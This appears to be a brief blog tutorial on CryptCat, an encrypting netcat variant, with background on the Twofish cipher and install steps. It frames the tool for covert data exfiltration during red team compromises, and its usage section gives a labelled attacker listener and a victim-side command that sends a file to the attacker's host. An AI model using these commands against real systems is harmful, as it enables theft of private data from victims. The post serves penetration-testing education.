CryptCat

September 05, 2021  

• • CryptCat Tools-Kali
• • CryptCat-SourceForge
• • Twofish
• • Cryptix
• • CryptCat Windows

Cryptcat is the standard netcat enhanced with twofish encryption with ports for WIndows NT, BSD and Linux. Twofish is courtesy of counterpane, and cryptix.

Cryptcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol while encrypting the data being transmitted. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Secure Transfer

There are several reasons why we should use Cryptcat, one of them is because of its TwoFish cipher developed by Counterpane Labs.

As you can imagine, in a red team compromise, you may encounter private / confidential data, which can be of much value to a red team (not to mention cybercriminals), when doing data exfiltration, you have to be sure of how you are going to operate, you have to keep in mind that there may also be a third party intercepting your connection, A perfect reference is when you use TunnelShell to create a covert channel, you are not encrypting any kind of connection, if somehow, some third party manages to find that connection, they could monitor you and steal your data at the same time you do the exfiltration, which would be devastating. That is why cryptography is used in any kind of connection.

TwoFish

• • Wikipedia

Twofish is a symmetric cryptography method with block encryption. The block size in Twofish is 128 bits and the key size can go up to 256 bits.

Designed by Bruce Schneier, John Kelsey, Doug Withing, David Wagner, Chris Hall and Niels Ferguson.

The distinguishing features of Twofish are the use of precomputed S-boxes with dependent keys and a relatively complex key-schedule.

Install

sudo apt-get update
sudo apt-get install cryptcat 

CryptCat Usage

Now let’s see how to use Cryptcat, for this example we will simply transfer a file.

Attacker Machine

cryptcat -l -p 443 -n > file

Victim Mahcine

cryptcat <ip> 443 < file

-l / listen mode, for inbound connects

-P / local port number

-n / numeric-only IP addresses, no DNS

---